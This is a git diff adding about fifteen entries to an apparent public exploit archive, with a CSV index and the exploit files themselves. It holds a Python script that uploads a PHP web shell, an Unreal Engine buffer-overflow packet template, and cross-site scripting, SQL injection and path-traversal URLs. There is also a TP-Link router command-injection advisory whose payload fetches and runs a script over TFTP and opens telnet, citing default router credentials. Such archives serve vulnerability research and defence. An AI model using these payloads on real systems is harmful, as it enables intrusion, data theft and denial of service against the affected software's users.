diff --git a/files.csv b/files.csv index a0baab06c..cd67e2c58 100755 --- a/files.csv +++ b/files.csv @@ -30845,3 +30845,18 @@ id,file,description,date,author,platform,type,port 34241,platforms/linux/webapps/34241.txt,"ISPConfig 3.0.54p1 - Authenticated Admin Local root Vulnerability",2014-08-02,mra,linux,webapps,8080 34243,platforms/ios/webapps/34243.txt,"Photo WiFi Transfer 1.01 - Directory Traversal Vulnerability",2014-08-02,Vulnerability-Lab,ios,webapps,8080 34245,platforms/php/webapps/34245.txt,"ArticleFR 11.06.2014 (data.php) - Privilege Escalation",2014-08-02,"High-Tech Bridge SA",php,webapps,80 +34246,platforms/php/webapps/34246.txt,"AL-Caricatier 2.5 'comment.php' Cross Site Scripting Vulnerability",2009-12-25,indoushka,php,webapps,0 +34248,platforms/multiple/dos/34248.txt,"EDItran Communications Platform (editcp) 4.1 Remote Buffer Overflow Vulnerability",2010-07-05,"Pedro Andujar",multiple,dos,0 +34249,platforms/linux/dos/34249.txt,"Freeciv 2.2.1 - Multiple Remote Denial Of Service Vulnerabilities",2010-07-03,"Luigi Auriemma",linux,dos,0 +34250,platforms/php/webapps/34250.txt,"Miniwork Studio Canteen 1.0 Component for Joomla! SQL Injection and Local File Include Vulnerabilities",2010-07-05,Drosophila,php,webapps,0 +34251,platforms/windows/dos/34251.txt,"Multiple Tripwire Interactive Games - 'STEAMCLIENTBLOB' Multiple Denial Of Service Vulnerabilities",2010-07-05,"Luigi Auriemma",windows,dos,0 +34252,platforms/php/webapps/34252.txt,"i-Net Solution Matrimonial Script 2.0.3 'alert.php' Cross Site Scripting Vulnerability",2010-07-06,"Andrea Bocchetti",php,webapps,0 +34253,platforms/php/webapps/34253.txt,"Orbis CMS 1.0.2 'editor-body.php' Cross Site Scripting Vulnerability",2010-07-05,"John Leitch",php,webapps,0 +34254,platforms/hardware/webapps/34254.txt,"TP-Link TL-WR740N v4 Router (FW-Ver. 3.16.6 Build 130529 Rel.47286n) - Command Execution",2014-08-03,"Christoph Kuhl",hardware,webapps,0 +34255,platforms/php/webapps/34255.html,"cPanel 11.25 Cross-Site Request Forgery Vulnerability",2010-07-03,G0D-F4Th3r,php,webapps,0 +34256,platforms/php/webapps/34256.py,"SocialABC NetworX 1.0.3 Arbitrary File Upload and Cross Site Scripting Vulnerabilities",2010-07-05,"John Leitch",php,webapps,0 +34257,platforms/php/webapps/34257.txt,"NTSOFT BBS E-Market Professional Multiple Cross Site Scripting Vulnerabilities",2010-07-06,"Ivan Sanchez",php,webapps,0 +34258,platforms/php/webapps/34258.txt,"NewsOffice 2.0.18 'news_show.php' Cross Site Scripting Vulnerability",2010-07-05,"John Leitch",php,webapps,0 +34259,platforms/php/webapps/34259.txt,"Bitweaver 2.7 'fImg' Parameter Cross Site Scripting Vulnerability",2010-07-05,"John Leitch",php,webapps,0 +34260,platforms/php/webapps/34260.txt,"odCMS 1.07 'archive.php' Cross Site Scripting Vulnerability",2010-07-05,"John Leitch",php,webapps,0 +34261,platforms/multiple/dos/34261.txt,"Unreal Engine <= 2.5 'UpdateConnectingMessage()' Remote Stack Buffer Overflow Vulnerability",2010-07-06,"Luigi Auriemma",multiple,dos,0 diff --git a/platforms/hardware/webapps/34254.txt b/platforms/hardware/webapps/34254.txt new file mode 100755 index 000000000..03684812c --- /dev/null +++ b/platforms/hardware/webapps/34254.txt @@ -0,0 +1,110 @@ +# Exploit Title: TP-Link TL-WR740N v4 router (FW-Ver. 3.16.6 Build +130529 Rel.47286n) arbitrary shell command execution +# Date: 08/03/2014 +# Exploit Author: Christoph Kuhl +# Vendor Homepage: http://www.tp-link.com +# Software Link: +http://www.tp-link.com.de/resources/software/TL-WR740N_V4_130529.zip +# Version: FW-Ver. 3.16.6 Build 130529 Rel.47286n +# Tested on: TP-Link TL-WR740N v4 + +Exploit: +http://www.exploit-db.com/sploits/34254.7z + +Vulnerability description: +The domain name parameters of the "Parental Control" and "Access +Control" features of the TP-Link TL-WR740N v4 (FW-Ver. 3.16.6 Build +130529 Rel.47286n) router are prone to arbitrary shell command execution +as root for users who are authenticated against the web interface. +Each shell payload is restricted up to 28 bytes. The "Parental Control" +feature allows you to specify 8 domains (= 8 commands) so you have 8 x +28 = 244 bytes of shell commands. This is sufficient to post-load and +execute a shell script of arbitrary length from a tftp server. +Employing this method one can gain full control over the device when +post-loading a mightier busybox MIPS binary and executing telnetd or +using netcat to connect back. Default login credentials are known to be +root:5up, Admin:5up or ap71:. + +Technical Cause: +The web interface and the whole routing logic on the device is +controlled by a single homebrew process (httpd) running as root. +This binary is employing various fopen() and system() calls in order to +configure the device. +One of these calls refers to a script (/tmp/wr841n/parent.sh) being +filled with user input data from the "Parental Control" mask. + +... +iptables -A FORWARD_PARENTCTRL -i br0 -m mac --mac-source +00:AF:FE:22:FE:AF -p tcp --dport 80 -m multiurl --urls USER INPUT +HERE,return1 -j RETURN +iptables -A FORWARD_PARENTCTRL -i br0 -m mac --mac-source +00:AF:FE:22:FE:AF -p tcp --dport 80 -m multiurl --urls ANOTHER USER +INPUT HERE,return1 -j RETURN +... + +The input data is only poorly checked by some JavaScript functions but +the server accepts most characters. Entering a shell command surrounded +by ';' will result in code execution: + +... +iptables -A FORWARD_PARENTCTRL -i br0 -m mac --mac-source +00:AF:FE:22:FE:AF -p tcp --dport 80 -m multiurl --urls ;tftp -gr a +192.168.0.1;,;sh a;,return1 -j RETURN +... + +The same goes for the Access Control Feature. The only difference is +that the script name is /tmp/wr841n/accessCtrl.sh. +The attack is persistent until resetting the parental control or access +control settings. After rebooting the device will execute the commands +again. +This vulnerability may or may not affect other TP-Link hardware and +software versions. However it was only tested against TP-Link TL-WR740N +v4 (FW-Ver. 3.16.6 Build 130529 Rel.47286n) within the local network. + + +Exploit POC code description: +The exploit tries to load and execute a shell script called 'a' (for +attack) from the specified tftpd server. This is for the circumventing +the length restriction of 28 bytes and the fact that the preloaded +busybox binary is a bit restricted (no netcat and telnetd available). +The 'a' script then loads a mightier busybox (filename busyboxx) binary +from the tftp server specified in that 'a' script (default 192.168.0.1). +It also sets up a more comfortable environment and starts telnetd as +well as a ftp server. +You can then connect to the router via telnet and ftp. +The exploit code is written in C# (.NET 4.5) so you need .NET Framework +4.5 to execute it. + +Usage: +ParentalControlExploit.exe [/a | /p] [RouterIp] [RouterWebIfaceUsername] +[RouterWebIfacePassword] [TFTPServerIp] + +TP-Link TL-WR740N v4 parental control and access control exploit. 2014 +by C. Kuhl. + + +Options: + /a Use Access Control Exploit + /p Use Parental Control Exploit + [RouterIp] IP of the target to attack (default 192.168.0.1) + [Username] Username of the Webinterface Login (default admin) + [Password] Username of the Webinterface Login (default admin) + [TFTPServer] TFTP Host where the 'a' shell file is hosted for execution + +Example: ParentalControlExploit.exe /a 192.168.0.1 admin admin 192.168.0.100 + + +History of the flaw: +07/01/2014 - Found it +07/05/2014 - Notified TP Link via their Online Support Contact +form including detailed description and link to POC exploit +07/14/2014 - Got answer via mail that they could not reproduce the +flaw via the router's web interface and asked for more information. +07/26/2014 - Replied to TP-Link that one cannot reproduce the bug +via the router's web interface due to the javascript "check logic" and +that they need to either employ direct GET requests or use the provided +exploit +07/29/2014 - TP Link states that this was no security flaw because +the attacker had to know the credientials to the webinterface. It was +like giving the key to your flat to a housebreaker. +08/03/2014 - Publication \ No newline at end of file diff --git a/platforms/linux/dos/34249.txt b/platforms/linux/dos/34249.txt new file mode 100755 index 000000000..2e2e784e0 --- /dev/null +++ b/platforms/linux/dos/34249.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/41352/info + +Freeciv is prone to multiple remote denial-of-service vulnerabilities because the application fails to properly handle specially crafted network packets. + +An attacker can exploit these issues to cause the applications to become unresponsive or to crash the affected game servers, denying service to legitimate users. + +Freeciv 2.2.1 is vulnerable; other versions may also be affected. + +http://www.exploit-db.com/sploits/34249.zip \ No newline at end of file diff --git a/platforms/multiple/dos/34248.txt b/platforms/multiple/dos/34248.txt new file mode 100755 index 000000000..3eca9ce6e --- /dev/null +++ b/platforms/multiple/dos/34248.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/41342/info + +EDItran Communications Platform (editcp) is prone to a remote buffer-overflow vulnerability because it fails to properly validate user-supplied input before copying it into a fixed-length buffer. + +Attackers can exploit this issue to execute arbitrary code in the context of the application. Failed attacks may cause a denial-of-service condition. + +editcp 4.1 R7 is vulnerable; other versions may also be affected. + +$ perl -e '{print "A"x100}' | nc www.example.com:7777 \ No newline at end of file diff --git a/platforms/multiple/dos/34261.txt b/platforms/multiple/dos/34261.txt new file mode 100755 index 000000000..d49218cc4 --- /dev/null +++ b/platforms/multiple/dos/34261.txt @@ -0,0 +1,39 @@ +source: http://www.securityfocus.com/bid/41424/info + +Unreal Engine is prone to a remote stack-based buffer-overflow vulnerability because it fails to properly bounds-check messages before copying them to an insufficiently sized memory buffer. + +Successful exploits can allow remote attackers to execute arbitrary machine code in the context of the user running the application. + +This issue affects games based on Unreal Engine 1, 2, and 2.5; other versions may be affected as well. + + +// Unreal engine <= 2.5 clients unicode buffer-overflow in UpdateConnectingMessage +// by Luigi Auriemma +// e-mail: aluigi@autistici.org +// web: aluigi.org +// +// Advisory: +// http://aluigi.org/adv/unrealcbof-adv.txt +// +// - http://aluigi.org/testz/unrealts.zip +// - launch it: unrealts 7777 unrealcbof.txt +// - launch a game based on the Unreal engine +// - open the console (~) +// - type: open 127.0.0.1:7777 +// - it's also possible to launch directly the game: game.exe 127.0.0.1:7777 + +// CHALLENGE can be random +CHALLENGE CHALLENGE=12345678 + +// GUID can be random +USES GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF PKG=bof FLAGS=1 SIZE=1 FNAME=bof + +// some games like SWAT4 require that LEVEL of WELCOME and this PKG are the same +USES GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF PKG=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxxxxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA FLAGS=1 SIZE=1 FNAME=bof + +// enable any possible type of download +DLMGR CLASS=Engine.ChannelDownload PARAMS=Enabled COMPRESSION=0 +DLMGR CLASS=IpDrv.HTTPDownload PARAMS=http://127.0.0.1/ COMPRESSION=0 + +// LEVEL must contain the overflow and shellcode (the UDP packet must be max 576 bytes or less for some games) +WELCOME LEVEL=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxxxxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA LONE=0 diff --git a/platforms/php/webapps/34246.txt b/platforms/php/webapps/34246.txt new file mode 100755 index 000000000..33352afcd --- /dev/null +++ b/platforms/php/webapps/34246.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/41338/info* + +AL-Caricatier is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +AL-Caricatier 2.5 is vulnerable; other versions may be affected. + +http://www.example.com/caricatier/comment.php?op=CatID%3D0&CatName=1alert(213771818860)%3B&CaricatierID=1 +http://www.example.com/caricatier/comment.php?op=CatID%3D0&CatName=indoushka@hotmail.com-00213771818860&CaricatierID=1 + diff --git a/platforms/php/webapps/34250.txt b/platforms/php/webapps/34250.txt new file mode 100755 index 000000000..b1f2df144 --- /dev/null +++ b/platforms/php/webapps/34250.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/41358/info + +The Miniwork Studio Canteen component for Joomla! is prone to an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data. + +Attackers can exploit the SQL-injection vulnerability to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute arbitrary local files within the context of the webserver process. Information harvested may aid in further attacks. + +Canteen 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php?option=com_canteen&controller=../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/34252.txt b/platforms/php/webapps/34252.txt new file mode 100755 index 000000000..2402fefb8 --- /dev/null +++ b/platforms/php/webapps/34252.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/41387/info + +i-Net Solution Matrimonial Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +i-Net Solution Matrimonial Script 2.0.3 is vulnerable; other versions may also be affected. + +http://www.example.com/products/shaadi/alert.php?id=%3Cscript%3Ealert(/XSS/)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34253.txt b/platforms/php/webapps/34253.txt new file mode 100755 index 000000000..e6a50a42f --- /dev/null +++ b/platforms/php/webapps/34253.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/41390/info + +Orbis CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Orbis CMS 1.0.2 is vulnerable; other versions may also be affected. + +http://www.example.com/admin/editors/text/editor-body.php?s=%22%3E%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34255.html b/platforms/php/webapps/34255.html new file mode 100755 index 000000000..9ac497433 --- /dev/null +++ b/platforms/php/webapps/34255.html @@ -0,0 +1,20 @@ +source: http://www.securityfocus.com/bid/41391/info + +cPanel is prone to a cross-site request-forgery vulnerability. + +Exploiting this issue may allow a remote attacker to perform certain administrative actions. This may lead to further attacks. + +cPanel 11.25 is vulnerable; other versions may also be affected. + + + +
+ + + + + +
+ + \ No newline at end of file diff --git a/platforms/php/webapps/34256.py b/platforms/php/webapps/34256.py new file mode 100755 index 000000000..4ddd3f6b6 --- /dev/null +++ b/platforms/php/webapps/34256.py @@ -0,0 +1,54 @@ +source: http://www.securityfocus.com/bid/41396/info + +SocialABC NetworX is prone to an arbitrary file-upload vulnerability and a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. + +Attackers can exploit these issues to steal cookie-based authentication information, execute arbitrary client-side scripts in the context of the browser, upload and execute arbitrary files in the context of the webserver, and launch other attacks. + +NetworX 1.0.3 is vulnerable; other versions may be affected. + +import sys, socket +host = 'localhost' +path = '/networx' +port = 80 + +def upload_shell(): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + s.settimeout(8) + + s.send('POST ' + path + '/upload.php?logout=shell.php HTTP/1.1\r\n' + 'Host: ' + host + '\r\n' + 'Proxy-Connection: keep-alive\r\n' + 'User-Agent: x\r\n' + 'Content-Length: 193\r\n' + 'Cache-Control: max-age=0\r\n' + 'Origin: null\r\n' + 'Content-Type: multipart/form-data; boundary=----x\r\n' + 'Accept: text/html\r\n' + 'Accept-Encoding: gzip,deflate,sdch\r\n' + 'Accept-Language: en-US,en;q=0.8\r\n' + 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n\r\n' + '------x\r\n' + 'Content-Disposition: form-data; name="Filedata"; filename="shell.php"\r\n' + 'Content-Type: application/octet-stream\r\n\r\n' + '" + system($_GET["CMD"]) + ""; ?>\r\n' + '------x--\r\n\r\n') + + resp = s.recv(8192) + + http_ok = 'HTTP/1.1 200 OK' + + if http_ok not in resp[:len(http_ok)]: + print 'error uploading shell' + return + else: print 'shell uploaded' + + shell_path = path + '/tmp/shell.php' + + s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\ + 'Host: ' + host + '\r\n\r\n') + + if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found' + else: print 'shell located at http://' + host + shell_path + +upload_shell() \ No newline at end of file diff --git a/platforms/php/webapps/34257.txt b/platforms/php/webapps/34257.txt new file mode 100755 index 000000000..59d6ff81b --- /dev/null +++ b/platforms/php/webapps/34257.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/41401/info + +NTSOFT BBS E-Market Professional is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + + +http://www.example.com/community/index.php?pageurl=Evil-code diff --git a/platforms/php/webapps/34258.txt b/platforms/php/webapps/34258.txt new file mode 100755 index 000000000..bad6a779c --- /dev/null +++ b/platforms/php/webapps/34258.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/41419/info + +NewsOffice is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +NewsOffice 2.0.18 is vulnerable; other versions may also be affected. + + +http://www.example.com/newsoffice/news_show.php?n-user=a&n-cat='%3E%3Cscript%3Ealert(0)%3C/script%3E diff --git a/platforms/php/webapps/34259.txt b/platforms/php/webapps/34259.txt new file mode 100755 index 000000000..a4006257f --- /dev/null +++ b/platforms/php/webapps/34259.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/41421/info + +Bitweaver is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Bitweaver 2.7 is vulnerable; other versions may also be affected. + +http://www.example.com/bitweaver/themes/preview_image.php?fImg=%22%3E%3Cscript%3Ealert(0)%3C/script%3E diff --git a/platforms/php/webapps/34260.txt b/platforms/php/webapps/34260.txt new file mode 100755 index 000000000..3ed431fab --- /dev/null +++ b/platforms/php/webapps/34260.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/41422/info + +odCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +odCMS 1.07 is vulnerable; other versions may also be affected. + + +http://www.example.com/odcms/codes/archive.php?design=%3Cscript%3Ealert(0)%3C/script%3E diff --git a/platforms/windows/dos/34251.txt b/platforms/windows/dos/34251.txt new file mode 100755 index 000000000..83e794e22 --- /dev/null +++ b/platforms/windows/dos/34251.txt @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/41361/info + +Multiple Tripwire Interactive games are prone to multiple remote denial-of-service vulnerabilities because the applications fail to properly handle specially crafted network packets. + +An attacker can exploit these issues to cause the applications to become unresponsive or to crash the affected game servers, denying service to legitimate users. + +The following games are vulnerable: + +Killing Floor +Red Orchestra +Darkest Hour: Europe '44-'45 +Mare Nostrum + +http://www.exploit-db.com/sploits/34251.zip \ No newline at end of file